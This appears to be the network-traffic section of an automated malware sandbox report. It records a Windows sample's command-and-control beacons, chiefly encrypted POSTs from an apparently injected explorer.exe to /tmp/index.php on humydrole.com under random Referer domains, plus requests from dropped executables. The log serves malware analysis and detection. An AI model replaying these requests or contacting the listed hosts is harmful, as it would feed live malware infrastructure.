                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                143192.168.2.456107180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:41.000540972 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://huwaudbeqfsonfq.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 171
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:41.000581026 CET171OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 40 4e fb e1
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu@N|&qL|qXoDN?<r'|AT\\:.e6LnaDCAj
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:42.020764112 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:41 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                144192.168.2.456108180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:42.354484081 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://peydgftdqchd.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 123
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:42.354551077 CET123OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 4c 59 f9 9d
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vuLY-o`p5Mhbq.Ibh
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:43.361048937 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:42 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                145192.168.2.456109180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:45.553812981 CET286OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://rpxbmpqrkuspwng.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 230
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:45.553906918 CET230OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 5d 03 d7 b8
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu]Oiz`2[F>;sTpdVZ30fb'(0pAh8>}n.Sm.~_AARzgGY@[
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:46.595005989 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:46 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                146192.168.2.45594592.240.253.14805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:46.484323025 CET233INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                                                                                                                                content-length: 110
                                                                                                                                                                                                                                                                                                                                cache-control: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                147192.168.2.456110180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:47.043730974 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://geonycqvjjw.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 131
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:47.043776989 CET131OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 6c 21 d5 ec
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vul!P=iBub$!WbG1|Da
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:48.069936991 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:47 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                148192.168.2.456111180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:48.408433914 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://jjrmxalykns.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 296
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:48.408473015 CET296OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 48 4c bf 95
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vuHLPERqq+^RWc.wA \gL'(x}C07`B/.tV&EzGE{sK::/-jzT}SPjO@+
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:49.406378984 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:48 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                149192.168.2.456112180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:49.740130901 CET285OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://qcglxqfkrbwarw.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 295
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:49.740220070 CET295OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 7f 49 cb f4
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vuImBur_9lx,m1LdFC!`f;RnE)!DbG^`~B<YY~1F=1nqyr)W3
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:50.739171982 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:50 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                150192.168.2.456113185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:59.620687962 CET299OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e2f834798823d2b6c47a7377425879a663bdccd82385b558fd807fa10cadd5a HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
